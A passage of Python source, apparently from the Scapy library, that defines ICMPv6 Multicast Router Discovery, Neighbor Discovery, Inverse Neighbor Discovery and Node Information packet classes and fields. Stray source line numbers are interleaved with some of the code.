        },
    }

    def extract_padding(self, s):
        """Keep the first 8 bytes for this layer, the rest is padding."""
        own, padding = s[:8], s[8:]
        return own, padding
1702
1703
class ICMPv6MRD_Solicitation(_ICMPv6):
    """Multicast Router Discovery Solicitation, ICMPv6 type 152."""

    name = "ICMPv6 Multicast Router Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 152, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {
            "nh": 58,
            "hlim": 1,
            "dst": "ff02::2",
        },
    }

    def extract_padding(self, s):
        """Keep the first 4 bytes for this layer, the rest is padding."""
        own, padding = s[:4], s[4:]
        return own, padding
1714
1715
class ICMPv6MRD_Termination(_ICMPv6):
    """Multicast Router Discovery Termination, ICMPv6 type 153."""

    name = "ICMPv6 Multicast Router Discovery Termination"
    fields_desc = [
        ByteEnumField("type", 153, icmp6types),
        ByteField("res", 0),
        XShortField("cksum", None),
    ]
    # IPv6 Router Alert requires manual inclusion
    overload_fields = {
        IPv6: {
            "nh": 58,
            "hlim": 1,
            "dst": "ff02::6A",
        },
    }

    def extract_padding(self, s):
        """Keep the first 4 bytes for this layer, the rest is padding."""
        own, padding = s[:4], s[4:]
        return own, padding
1726
1727
1728#                   ICMPv6 Neighbor Discovery (RFC 2461)                    #
1729
# Human-readable names of Neighbor Discovery option types, keyed by the
# value of the option 'type' byte. Types 31, 37 and 38 are listed because
# this module implements them (see icmp6ndoptscls).
icmp6ndopts = {
    1: "Source Link-Layer Address",
    2: "Target Link-Layer Address",
    3: "Prefix Information",
    4: "Redirected Header",
    5: "MTU",
    6: "NBMA Shortcut Limit Option",  # RFC2491
    7: "Advertisement Interval Option",
    8: "Home Agent Information Option",
    9: "Source Address List",
    10: "Target Address List",
    11: "CGA Option",            # RFC 3971
    12: "RSA Signature Option",  # RFC 3971
    13: "Timestamp Option",      # RFC 3971
    14: "Nonce option",          # RFC 3971
    15: "Trust Anchor Option",   # RFC 3971
    16: "Certificate Option",    # RFC 3971
    17: "IP Address Option",                             # RFC 4068
    18: "New Router Prefix Information Option",          # RFC 4068
    19: "Link-layer Address Option",                     # RFC 4068
    20: "Neighbor Advertisement Acknowledgement Option",
    21: "CARD Request Option",  # RFC 4065/4066/4067
    22: "CARD Reply Option",   # RFC 4065/4066/4067
    23: "MAP Option",          # RFC 4140
    24: "Route Information Option",  # RFC 4191
    25: "Recursive DNS Server Option",
    26: "IPv6 Router Advertisement Flags Option",
    31: "DNS Search List Option",  # RFC 6106
    37: "Captive-Portal Option",   # RFC 8910
    38: "PREF64 Option",           # RFC 8781
}
1757
# Maps a Neighbor Discovery option type to the name of the class that
# dissects it. Types without an entry are not handled by this table.
icmp6ndoptscls = {
    1: "ICMPv6NDOptSrcLLAddr",
    2: "ICMPv6NDOptDstLLAddr",
    3: "ICMPv6NDOptPrefixInfo",
    4: "ICMPv6NDOptRedirectedHdr",
    5: "ICMPv6NDOptMTU",
    6: "ICMPv6NDOptShortcutLimit",
    7: "ICMPv6NDOptAdvInterval",
    8: "ICMPv6NDOptHAInfo",
    9: "ICMPv6NDOptSrcAddrList",
    10: "ICMPv6NDOptTgtAddrList",
    # 11: ICMPv6NDOptCGA, RFC3971 - contrib/send.py
    # 12: ICMPv6NDOptRsaSig, RFC3971 - contrib/send.py
    # 13: ICMPv6NDOptTmstp, RFC3971 - contrib/send.py
    # 14: ICMPv6NDOptNonce, RFC3971 - contrib/send.py
    # 15, 16: not implemented
    17: "ICMPv6NDOptIPAddr",
    18: "ICMPv6NDOptNewRtrPrefix",
    19: "ICMPv6NDOptLLA",
    # 20, 21, 22: not implemented
    23: "ICMPv6NDOptMAP",
    24: "ICMPv6NDOptRouteInfo",
    25: "ICMPv6NDOptRDNSS",
    26: "ICMPv6NDOptEFA",
    31: "ICMPv6NDOptDNSSL",
    37: "ICMPv6NDOptCaptivePortal",
    38: "ICMPv6NDOptPREF64",
}
1790
# Router preference values (RFC 4191), as used by the 2-bit 'prf' fields.
icmp6ndraprefs = {
    0: "Medium (default)",
    1: "High",
    2: "Reserved",
    3: "Low",
}
1795
1796
1797class _ICMPv6NDGuessPayload:
1798    name = "Dummy ND class that implements guess_payload_class()"
1799
1800    def guess_payload_class(self, p):
1801        if len(p) > 1:
1802            return icmp6ndoptscls.get(orb(p[0]), ICMPv6NDOptUnknown)
1803
1804
1805# Beginning of ICMPv6 Neighbor Discovery Options.
1806
class ICMPv6NDOptDataField(StrLenField):
    """Option data that is zero-padded when built.

    The padding makes len(data) + 2 a multiple of 8. With strip_zeros
    set, trailing zero bytes are removed again when dissecting.
    """
    __slots__ = ["strip_zeros"]

    def __init__(self, name, default, strip_zeros=False, **kwargs):
        super().__init__(name, default, **kwargs)
        self.strip_zeros = strip_zeros

    def i2len(self, pkt, x):
        # The reported length is the padded (on-wire) one.
        wire = self.i2m(pkt, x)
        return len(wire)

    def i2m(self, pkt, x):
        # Number of zero bytes needed to reach the next multiple of 8 once
        # the 2 extra bytes are accounted for.
        shortfall = -(len(x) + 2) % 8
        if shortfall:
            x += b"\x00" * shortfall
        return x

    def m2i(self, pkt, x):
        if not self.strip_zeros:
            return x
        return x.rstrip(b"\x00")
1827
1828
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
    """Generic type/len/data layout for options without a dedicated class."""

    name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
    fields_desc = [
        ByteField("type", 0),
        # 'len' is in units of 8 bytes and includes the type and len bytes.
        FieldLenField("len", None, length_of="data", fmt="B",
                      adjust=lambda opt, size: (2 + size) // 8),
        # A 'len' of 0 is read as if it were 1.
        ICMPv6NDOptDataField("data", "", strip_zeros=False,
                             length_from=lambda opt: 8 * max(opt.len, 1) - 2),
    ]
1837
1838# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: Revisit the ETHER_ANY handling
1840
1841
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
    """Source Link-Layer Address option (type 1)."""

    name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
    fields_desc = [
        ByteField("type", 1),
        ByteField("len", 1),
        SourceMACField("lladdr"),
    ]

    def mysummary(self):
        """One-line summary: option name followed by the address."""
        template = "%name% %lladdr%"
        return self.sprintf(template)
1850
1851
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
    """Same layout as ICMPv6NDOptSrcLLAddr, with option type 2."""

    type = 2
    name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
1855
1856
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
    """Prefix Information option (type 3)."""

    name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
    fields_desc = [
        ByteField("type", 3),
        ByteField("len", 4),
        ByteField("prefixlen", 64),
        # Flag bits; the mysummary() labels give their meaning.
        BitField("L", 1, 1),
        BitField("A", 1, 1),
        BitField("R", 0, 1),
        BitField("res1", 0, 5),
        XIntField("validlifetime", 0xffffffff),
        XIntField("preferredlifetime", 0xffffffff),
        XIntField("res2", 0x00000000),
        IP6Field("prefix", "::"),
    ]

    def mysummary(self):
        """One-line summary: prefix, prefix length and the L/A/R flags."""
        template = ("%name% %prefix%/%prefixlen% "
                    "On-link %L% Autonomous Address %A% "
                    "Router Address %R%")
        return self.sprintf(template)
1875
1876# TODO: We should also limit the size of included packet to something
1877# like (initiallen - 40 - 2)
1878
1879
class TruncPktLenField(PacketLenField):
    """PacketLenField whose built value is cut to a multiple of 8 bytes."""

    def i2m(self, pkt, x):
        # Drop the trailing bytes that do not fill a complete 8-byte unit.
        built = bytes(x)
        keep = len(built) - (len(built) % 8)
        return built[:keep]

    def i2len(self, pkt, i):
        # Length of the truncated value, not of the original packet.
        truncated = self.i2m(pkt, i)
        return len(truncated)
1888
1889
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
    """Redirected Header option (type 4) embedding an IPv6 packet."""

    name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
    fields_desc = [
        ByteField("type", 4),
        # 8 bytes of option header (type, len, res) plus the embedded
        # packet, expressed in units of 8 bytes.
        FieldLenField("len", None, length_of="pkt", fmt="B",
                      adjust=lambda opt, size: (size + 8) // 8),
        MayEnd(StrFixedLenField("res", b"\x00" * 6, 6)),
        TruncPktLenField("pkt", b"", IPv6,
                         length_from=lambda opt: 8 * opt.len - 8),
    ]
1898
1899# See which value should be used for default MTU instead of 1280
1900
1901
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
    """MTU option (type 5); 'mtu' defaults to 1280."""

    name = "ICMPv6 Neighbor Discovery Option - MTU"
    fields_desc = [
        ByteField("type", 5),
        ByteField("len", 1),
        XShortField("res", 0),
        IntField("mtu", 1280),
    ]

    def mysummary(self):
        """One-line summary: option name followed by the MTU."""
        template = "%name% %mtu%"
        return self.sprintf(template)
1911
1912
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet):
    """NBMA Shortcut Limit option (RFC 2491, type 6)."""

    name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
    fields_desc = [
        ByteField("type", 6),
        ByteField("len", 1),
        ByteField("shortcutlim", 40),  # XXX
        ByteField("res1", 0),
        IntField("res2", 0),
    ]
1920
1921
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
    """Advertisement Interval option (type 7)."""

    name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
    fields_desc = [
        ByteField("type", 7),
        ByteField("len", 1),
        ShortField("res", 0),
        IntField("advint", 0),
    ]

    def mysummary(self):
        """One-line summary: option name and interval in milliseconds."""
        template = "%name% %advint% milliseconds"
        return self.sprintf(template)
1931
1932
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
    """Home Agent Information option (type 8)."""

    name = "ICMPv6 Neighbor Discovery - Home Agent Information"
    fields_desc = [
        ByteField("type", 8),
        ByteField("len", 1),
        ShortField("res", 0),
        ShortField("pref", 0),
        ShortField("lifetime", 1),
    ]

    def mysummary(self):
        """One-line summary: name, preference and lifetime in seconds."""
        template = "%name% %pref% %lifetime% seconds"
        return self.sprintf(template)
1943
1944# type 9  : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
1945
1946# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
1947
1948
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet):
    """IP Address option (RFC 4068, type 17)."""

    name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
    fields_desc = [
        ByteField("type", 17),
        ByteField("len", 3),
        ByteEnumField("optcode", 1, {
            1: "Old Care-Of Address",
            2: "New Care-Of Address",
            3: "NAR's IP address",
        }),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("addr", "::"),
    ]
1959
1960
class ICMPv6NDOptNewRtrPrefix(_ICMPv6NDGuessPayload, Packet):
    """New Router Prefix Information option (RFC 4068, type 18)."""

    name = "ICMPv6 Neighbor Discovery - New Router Prefix Information Option (FH for MIPv6)"  # noqa: E501
    fields_desc = [
        ByteField("type", 18),
        ByteField("len", 3),
        ByteField("optcode", 0),
        ByteField("plen", 64),
        IntField("res", 0),
        IP6Field("prefix", "::"),
    ]
1969
1970
1971_rfc4068_lla_optcode = {0: "Wildcard requesting resolution for all nearby AP",
1972                        1: "LLA for the new AP",
1973                        2: "LLA of the MN",
1974                        3: "LLA of the NAR",
1975                        4: "LLA of the src of TrSolPr or PrRtAdv msg",
1976                        5: "AP identified by LLA belongs to current iface of router",  # noqa: E501
1977                        6: "No preifx info available for AP identified by the LLA",  # noqa: E501
1978                        7: "No fast handovers support for AP identified by the LLA"}  # noqa: E501
1979
1980
class ICMPv6NDOptLLA(_ICMPv6NDGuessPayload, Packet):
    """Link-Layer Address (LLA) option (RFC 4068, type 19)."""

    name = "ICMPv6 Neighbor Discovery - Link-Layer Address (LLA) Option (FH for MIPv6)"  # noqa: E501
    # NOTE(review): type + len + optcode + a MAC address does not add up to
    # a multiple of 8 bytes while 'len' defaults to 1 - confirm whether
    # padding is expected here.
    fields_desc = [
        ByteField("type", 19),
        ByteField("len", 1),
        ByteEnumField("optcode", 0, _rfc4068_lla_optcode),
        MACField("lla", ETHER_ANY),  # We only support ethernet
    ]
1987
1988
class ICMPv6NDOptMAP(_ICMPv6NDGuessPayload, Packet):
    """MAP option (RFC 4140, type 23)."""

    name = "ICMPv6 Neighbor Discovery - MAP Option"
    fields_desc = [
        ByteField("type", 23),
        ByteField("len", 3),
        BitField("dist", 1, 4),
        BitField("pref", 15, 4),  # highest availability
        BitField("R", 1, 1),
        BitField("res", 0, 7),
        IntField("validlifetime", 0xffffffff),
        IP6Field("addr", "::"),
    ]
1999
2000
class _IP6PrefixField(IP6Field):
    """IPv6 prefix whose on-wire size is driven by the packet's 'len'.

    The prefix occupies 8 * (len - 1) bytes: nothing for len 0 or 1,
    the first 8 bytes for len 2, 16 bytes for len 3, and 16 bytes plus
    zero padding for larger values.
    """
    __slots__ = ["length_from"]

    def __init__(self, name, default):
        IP6Field.__init__(self, name, default)
        self.length_from = lambda pkt: 8 * (pkt.len - 1)

    def addfield(self, pkt, s, val):
        encoded = self.i2m(pkt, val)
        return s + encoded

    def getfield(self, pkt, s):
        nbytes = self.length_from(pkt)
        chunk = s[:nbytes]
        # Short prefixes are completed with zeros before conversion.
        if nbytes < 16:
            chunk += b'\x00' * (16 - nbytes)
        return s[nbytes:], self.m2i(pkt, chunk)

    def i2len(self, pkt, x):
        encoded = self.i2m(pkt, x)
        return len(encoded)

    def i2m(self, pkt, x):
        optlen = pkt.len

        if x is None:
            x = "::"
            # No prefix and no explicit length: build an empty prefix.
            if optlen is None:
                optlen = 1
        packed = inet_pton(socket.AF_INET6, x)

        if optlen is None:
            # Length not known yet: emit the full 16-byte address.
            return packed
        if optlen in (0, 1):
            return b""
        if optlen in (2, 3):
            return packed[:8 * (optlen - 1)]

        return packed + b'\x00' * 8 * (optlen - 3)
2038
2039
class ICMPv6NDOptRouteInfo(_ICMPv6NDGuessPayload, Packet):
    """Route Information option (RFC 4191, type 24)."""

    name = "ICMPv6 Neighbor Discovery Option - Route Information Option"
    fields_desc = [
        ByteField("type", 24),
        # One 8-byte unit for the fixed part plus the built prefix bytes.
        FieldLenField("len", None, length_of="prefix", fmt="B",
                      adjust=lambda opt, size: size // 8 + 1),
        ByteField("plen", None),
        BitField("res1", 0, 3),
        BitEnumField("prf", 0, 2, icmp6ndraprefs),
        BitField("res2", 0, 3),
        IntField("rtlifetime", 0xffffffff),
        _IP6PrefixField("prefix", None),
    ]

    def mysummary(self):
        """One-line summary: prefix, prefix length and preference."""
        template = "%name% %prefix%/%plen% Preference %prf%"
        return self.sprintf(template)
2054
2055
class ICMPv6NDOptRDNSS(_ICMPv6NDGuessPayload, Packet):
    """Recursive DNS Server option (RFC 5006, type 25)."""

    name = "ICMPv6 Neighbor Discovery Option - Recursive DNS Server Option"
    fields_desc = [
        ByteField("type", 25),
        # Two 8-byte units per listed address, plus one for the header.
        FieldLenField("len", None, count_of="dns", fmt="B",
                      adjust=lambda opt, count: 2 * count + 1),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        IP6ListField("dns", [],
                     length_from=lambda opt: 8 * (opt.len - 1)),
    ]

    def mysummary(self):
        """One-line summary: option name and comma-separated servers."""
        servers = ", ".join(self.dns)
        return self.sprintf("%name% ") + servers
2068
2069
class ICMPv6NDOptEFA(_ICMPv6NDGuessPayload, Packet):
    """Expanded Flags option (RFC 5175, previously 5075; type 26)."""

    name = "ICMPv6 Neighbor Discovery Option - Expanded Flags Option"
    fields_desc = [
        ByteField("type", 26),
        ByteField("len", 1),
        BitField("res", 0, 48),
    ]
2075
2076# As required in Sect 8. of RFC 3315, Domain Names must be encoded as
2077# described in section 3.1 of RFC 1035
2078# XXX Label should be at most 63 octets in length : we do not enforce it
2079#     Total length of domain should be 255 : we do not enforce it either
2080
2081
class DomainNameListField(StrLenField):
    """List of domain names stored as length-prefixed DNS labels.

    The internal value is a list of dotted names (str). On the wire each
    name is a sequence of <length byte><label> items ended by a zero
    byte. With padded=True the built value is zero-padded to a multiple
    of padded_unit bytes and empty names are skipped when dissecting.

    Label lengths are counted in bytes of the UTF-8 encoded label, both
    when building and when dissecting, so non-ASCII labels round-trip.
    """
    __slots__ = ["padded"]
    islist = 1
    padded_unit = 8

    def __init__(self, name, default, length_from=None, padded=False):  # noqa: E501
        self.padded = padded
        StrLenField.__init__(self, name, default, length_from=length_from)

    def i2len(self, pkt, x):
        return len(self.i2m(pkt, x))

    def i2h(self, pkt, x):
        # Any empty value (None, "", b"", []) is shown as an empty list.
        if not x:
            return []
        return x

    def m2i(self, pkt, x):
        """Decode wire bytes into a list of dotted names ending with '.'."""
        # Work on bytes so that each length byte counts bytes, not
        # decoded characters; labels are turned into str one by one.
        x = bytes_encode(x)
        res = []
        while x:
            # Collect labels until a zero length byte (or the end).
            cur = []
            while x and x[0] != 0:
                label_len = x[0]
                cur.append(plain_str(x[1:label_len + 1]))
                x = x[label_len + 1:]
            # In padded mode an empty name is just padding: skip it.
            if cur or not self.padded:
                res.append(".".join(cur) + ".")
            # Consume the zero byte that ended the name.
            if x and x[0] == 0:
                x = x[1:]
        return res

    def i2m(self, pkt, x):
        """Encode a list of dotted names (str) into wire bytes."""
        def encode_name(dotted):
            # Encode first, then measure: the length byte must describe
            # the bytes that actually follow it.
            labels = (part.encode("utf8") for part in dotted.split('.'))
            wire = b"".join(chb(len(label)) + label for label in labels)
            # A name given with a trailing dot already ends with the
            # zero-length root label; otherwise add the terminator.
            if wire.endswith(b'\x00'):
                return wire
            return wire + b'\x00'

        ret_string = b"".join(encode_name(dotted) for dotted in x)

        # In padded mode, add some \x00 bytes
        if self.padded:
            missing = -len(ret_string) % self.padded_unit
            if missing:
                ret_string += b"\x00" * missing

        return ret_string
2134
2135
class ICMPv6NDOptDNSSL(_ICMPv6NDGuessPayload, Packet):
    """DNS Search List option (RFC 6106, type 31)."""

    name = "ICMPv6 Neighbor Discovery Option - DNS Search List Option"
    fields_desc = [
        ByteField("type", 31),
        # One 8-byte unit for the header plus the padded search list.
        FieldLenField("len", None, length_of="searchlist", fmt="B",
                      adjust=lambda opt, size: 1 + size // 8),
        ShortField("res", None),
        IntField("lifetime", 0xffffffff),
        DomainNameListField("searchlist", [],
                            length_from=lambda opt: 8 * opt.len - 8,
                            padded=True),
    ]

    def mysummary(self):
        """One-line summary: option name and comma-separated domains."""
        domains = ", ".join(self.searchlist)
        return self.sprintf("%name% ") + domains
2150
2151
class ICMPv6NDOptCaptivePortal(_ICMPv6NDGuessPayload, Packet):
    """Captive-Portal option (RFC 8910, type 37) carrying a URI."""

    name = "ICMPv6 Neighbor Discovery Option - Captive-Portal Option"
    fields_desc = [
        ByteField("type", 37),
        # 'len' is in units of 8 bytes and includes the type and len bytes.
        FieldLenField("len", None, length_of="URI", fmt="B",
                      adjust=lambda opt, size: (2 + size) // 8),
        # Trailing zero padding is stripped from the URI on dissection.
        ICMPv6NDOptDataField("URI", "", strip_zeros=True,
                             length_from=lambda opt: 8 * max(opt.len, 1) - 2),
    ]

    def mysummary(self):
        """One-line summary: option name followed by the URI."""
        template = "%name% %URI%"
        return self.sprintf(template)
2163
2164
class _PREF64(IP6Field):
    """IPv6 field that only carries the first 12 bytes of the address."""

    def addfield(self, pkt, s, val):
        # Only the leading 12 bytes go on the wire.
        packed = self.i2m(pkt, val)
        return s + packed[:12]

    def getfield(self, pkt, s):
        # Complete the 12 wire bytes with 4 zero bytes before conversion.
        head, rest = s[:12], s[12:]
        return rest, self.m2i(pkt, head + b"\x00" * 4)
2171
2172
class ICMPv6NDOptPREF64(_ICMPv6NDGuessPayload, Packet):
    """PREF64 option (RFC 8781, type 38)."""

    name = "ICMPv6 Neighbor Discovery Option - PREF64 Option"
    fields_desc = [
        ByteField("type", 38),
        ByteField("len", 2),
        BitField("scaledlifetime", 0, 13),
        # Prefix length code: index into the list of prefix lengths.
        BitEnumField("plc", 0, 3,
                     ["/96", "/64", "/56", "/48", "/40", "/32"]),
        _PREF64("prefix", "::"),
    ]

    def mysummary(self):
        """One-line summary: option name, prefix and prefix length."""
        # Codes 6 and 7 have no entry in the enumeration above.
        if self.plc < 6:
            plc = self.sprintf("%plc%")
        else:
            plc = f"[invalid PLC({self.plc})]"
        return self.sprintf("%name% %prefix%") + plc
2185
2186# End of ICMPv6 Neighbor Discovery Options.
2187
2188
class ICMPv6ND_RS(_ICMPv6NDGuessPayload, _ICMPv6):
    """Neighbor Discovery Router Solicitation, ICMPv6 type 133."""

    name = "ICMPv6 Neighbor Discovery - Router Solicitation"
    fields_desc = [
        ByteEnumField("type", 133, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::2",
            "hlim": 255,
        },
    }
2196
2197
class ICMPv6ND_RA(_ICMPv6NDGuessPayload, _ICMPv6):
    """Neighbor Discovery Router Advertisement, ICMPv6 type 134."""

    name = "ICMPv6 Neighbor Discovery - Router Advertisement"
    fields_desc = [
        ByteEnumField("type", 134, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        ByteField("chlim", 0),
        BitField("M", 0, 1),
        BitField("O", 0, 1),
        BitField("H", 0, 1),
        BitEnumField("prf", 1, 2, icmp6ndraprefs),  # RFC 4191
        BitField("P", 0, 1),
        BitField("res", 0, 2),
        ShortField("routerlifetime", 1800),
        IntField("reachabletime", 0),
        IntField("retranstimer", 0),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }

    def answers(self, other):
        """An advertisement answers any Router Solicitation."""
        is_solicitation = isinstance(other, ICMPv6ND_RS)
        return is_solicitation

    def mysummary(self):
        """One-line summary: lifetime, hop limit, preference and flags."""
        template = ("%name% Lifetime %routerlifetime% "
                    "Hop Limit %chlim% Preference %prf% "
                    "Managed %M% Other %O% Home %H%")
        return self.sprintf(template)
2222
2223
class ICMPv6ND_NS(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Discovery Neighbor Solicitation, ICMPv6 type 135."""

    name = "ICMPv6 Neighbor Discovery - Neighbor Solicitation"
    fields_desc = [
        ByteEnumField("type", 135, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        IntField("res", 0),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }

    def mysummary(self):
        """One-line summary: message name and target address."""
        template = "%name% (tgt: %tgt%)"
        return self.sprintf(template)

    def hashret(self):
        """Hash on the target address, then on the payload's own hash."""
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()
2238
2239
class ICMPv6ND_NA(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Discovery Neighbor Advertisement, ICMPv6 type 136."""

    name = "ICMPv6 Neighbor Discovery - Neighbor Advertisement"
    fields_desc = [
        ByteEnumField("type", 136, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        BitField("R", 1, 1),
        BitField("S", 0, 1),
        BitField("O", 1, 1),
        XBitField("res", 0, 29),
        IP6Field("tgt", "::"),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }

    def mysummary(self):
        """One-line summary: message name and target address."""
        template = "%name% (tgt: %tgt%)"
        return self.sprintf(template)

    def hashret(self):
        """Hash on the target address, then on the payload's own hash."""
        target = bytes_encode(self.tgt)
        return target + self.payload.hashret()

    def answers(self, other):
        """Answer a Neighbor Solicitation for the same target address."""
        if not isinstance(other, ICMPv6ND_NS):
            return False
        return self.tgt == other.tgt
2260
2261# associated possible options : target link-layer option, Redirected header
2262
2263
class ICMPv6ND_Redirect(_ICMPv6NDGuessPayload, _ICMPv6, Packet):
    """Neighbor Discovery Redirect, ICMPv6 type 137."""

    name = "ICMPv6 Neighbor Discovery - Redirect"
    fields_desc = [
        ByteEnumField("type", 137, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("res", 0),
        IP6Field("tgt", "::"),
        IP6Field("dst", "::"),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }
2273
2274
2275#                ICMPv6 Inverse Neighbor Discovery (RFC 3122)               #
2276
class ICMPv6NDOptSrcAddrList(_ICMPv6NDGuessPayload, Packet):
    """Inverse Neighbor Discovery Source Address List option (type 9)."""

    name = "ICMPv6 Inverse Neighbor Discovery Option - Source Address List"
    fields_desc = [
        ByteField("type", 9),
        # Two 8-byte units per listed address, plus one for the header.
        FieldLenField("len", None, count_of="addrlist", fmt="B",
                      adjust=lambda opt, count: 2 * count + 1),
        StrFixedLenField("res", b"\x00" * 6, 6),
        IP6ListField("addrlist", [],
                     length_from=lambda opt: 8 * (opt.len - 1)),
    ]
2285
2286
class ICMPv6NDOptTgtAddrList(ICMPv6NDOptSrcAddrList):
    """Same layout as ICMPv6NDOptSrcAddrList, with option type 10."""

    type = 10
    name = "ICMPv6 Inverse Neighbor Discovery Option - Target Address List"
2290
2291
# RFC3122
# Required options: source lladdr and target lladdr
# Other valid options: source address list, MTU
# - As stated in the document, it would be good to take the L2 address
#   requested in the required target lladdr option and use it as the
#   Ethernet destination address if no address is specified
# - this does not seem very practical if the user has to specify all
#   the options.
# Ether() must use the target lladdr as destination
class ICMPv6ND_INDSol(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Solicitation, ICMPv6 type 141."""

    name = "ICMPv6 Inverse Neighbor Discovery Solicitation"
    fields_desc = [
        ByteEnumField("type", 141, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }
2308
# Required options: target lladdr, target address list
# Other valid options: MTU
2311
2312
class ICMPv6ND_INDAdv(_ICMPv6NDGuessPayload, _ICMPv6):
    """Inverse Neighbor Discovery Advertisement, ICMPv6 type 142."""

    name = "ICMPv6 Inverse Neighbor Discovery Advertisement"
    fields_desc = [
        ByteEnumField("type", 142, icmp6types),
        ByteField("code", 0),
        XShortField("cksum", None),
        XIntField("reserved", 0),
    ]
    overload_fields = {
        IPv6: {
            "nh": 58,
            "dst": "ff02::1",
            "hlim": 255,
        },
    }
2320
2321
2322###############################################################################
2323# ICMPv6 Node Information Queries (RFC 4620)
2324###############################################################################
2325
2326# [ ] Add automatic destination address computation using computeNIGroupAddr
2327#     in IPv6 class (Scapy6 modification when integrated) if :
2328#     - it is not provided
2329#     - upper layer is ICMPv6NIQueryName() with a valid value
2330# [ ] Try to be liberal in what we accept as internal values for _explicit_
2331#     DNS elements provided by users. Any string should be considered
2332#     valid and kept like it has been provided. At the moment, i2repr() will
2333#     crash on many inputs
2334# [ ] Do the documentation
2335# [ ] Add regression tests
2336# [ ] Perform test against real machines (NOOP reply is proof of implementation).  # noqa: E501
2337# [ ] Check if there are differences between different stacks. Among *BSD,
2338#     with others.
2339# [ ] Deal with flags in a consistent way.
# [ ] Implement compression in names2dnsrepr() and decompression in
#     dnsrepr2names(). It should be possible to disable it.
2342
# Display names for the Qtype values of Node Information messages.
icmp6_niqtypes = {
    0: "NOOP",
    2: "Node Name",
    3: "IPv6 Address",
    4: "IPv4 Address",
}
2347
2348
class _ICMPv6NIHashret:
    """Mixin hashing a Node Information message on its nonce."""

    def hashret(self):
        nonce = self.nonce
        return bytes_encode(nonce)
2352
2353
2354class _ICMPv6NIAnswers:
2355    def answers(self, other):
2356        return self.nonce == other.nonce
2357
2358# Buggy; always returns the same value during a session
2359
2360
class NonceField(StrFixedLenField):
    """8-byte fixed-length string field used for nonces.

    When no default is given, the default is set once, at field creation,
    to the value returned by self.randval().
    """

    def __init__(self, name, default=None):
        StrFixedLenField.__init__(self, name, default, 8)
        if default is not None:
            return
        self.default = self.randval()
2366
2367
@conf.commands.register
def computeNIGroupAddr(name):
    """Compute the NI group Address. Can take a FQDN as input parameter

    Only the first label of *name*, lowercased, is used. It is prefixed
    with its length, hashed with MD5, and the first 4 bytes of the digest
    become the last 32 bits of an ff02::2:xxxx:xxxx address.

    :param name: host name or FQDN (str)
    :return: the group address in textual form (str)
    """
    name = name.lower().split(".")[0]
    record = chr(len(name)) + name
    digest = md5(record.encode("utf8")).digest()
    # Zero-pad each byte to two hex digits: "%2x" pads with a space, which
    # produced an invalid address whenever a digest byte was below 0x10.
    # NOTE(review): RFC 4620 seems to append only 24 hash bits to
    # ff02::2:ff00:0/104; this keeps the existing 32-bit layout - confirm.
    addr = "ff02::2:%02x%02x:%02x%02x" % struct.unpack("BBBB", digest[:4])
    return addr
2377
2378
2379# Here is the deal. First, that protocol is a piece of shit. Then, we
2380# provide 4 classes for the different kinds of Requests (one for every
2381# valid qtype: NOOP, Node Name, IPv6@, IPv4@). They all share the same
2382# data field class that is made to be smart by guessing the specific
2383# type of value provided :
2384#
2385# - IPv6 if acceptable for inet_pton(AF_INET6, ): code is set to 0,
2386#   if not overridden by user
2387# - IPv4 if acceptable for inet_pton(AF_INET,  ): code is set to 2,
2388#   if not overridden
2389# - Name in the other cases: code is set to 0, if not overridden by user
2390#
# Internal storage is not only the value, but a pair providing
# the type and the value (0 is IPv6@, 1 is Name or string, 2 is IPv4@)
2393#
2394# Note : I merged getfield() and m2i(). m2i() should not be called
2395#        directly anyway. Same remark for addfield() and i2m()
2396#
2397# -- arno
2398
